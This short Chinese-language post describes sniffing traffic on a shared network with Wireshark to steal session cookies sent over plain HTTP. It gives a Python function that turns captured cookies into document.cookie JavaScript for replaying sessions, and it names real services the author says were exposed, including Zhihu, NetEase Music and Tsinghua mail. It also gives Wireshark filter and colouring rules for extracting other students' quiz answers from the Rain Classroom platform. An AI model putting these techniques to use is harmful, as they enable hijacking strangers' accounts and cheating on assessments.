wireshark挂着,抓抓空气中的数据。

写了个脚本利用抓到的cookie。

大概长这样:

def cookie_to_js(s):
    res = ''
    a=s.split(';')
    for x in a:
        if '=' in x:
            res+='document.cookie="%s";'%(x)
            
    return res

print(cookie_to_js('a=b;c=d;'))

有其他好用的工具的话就见笑了,求推荐。

http://apilive.zhihu.com/apilive 这个websocket好像会被客户端访问,没有用https,可以抓到cookie。

http://music.163.com/ 这个也是。

http://mail.tsinghua.edu.cn/ 也是。

learn以及info没有成功。(ps, 后来成功了)

(感觉我需要一个浏览器插件,禁止所有的带cookie的http出流量。

另外雨课堂:

http and http.request.uri contains "answer_lesson_problem"

这个规则可以过滤出答题的包。

配合下面的染色规则可以直观得到每个包的答案。

@D@tcp contains "\"result\":\"D\""@[65535,65535,65535][65535,32896,0]
@C@tcp contains "\"result\":\"C\""@[65535,65535,65535][32896,0,32896]
@B@tcp contains "\"result\":\"B\""@[65535,65535,65535][65535,0,0]
@A@tcp contains "\"result\":\"A\""@[65535,65535,65535][0,0,65535]

另外,想用python实时处理抓到的流应该用什么库啊?(pypcap好像不行)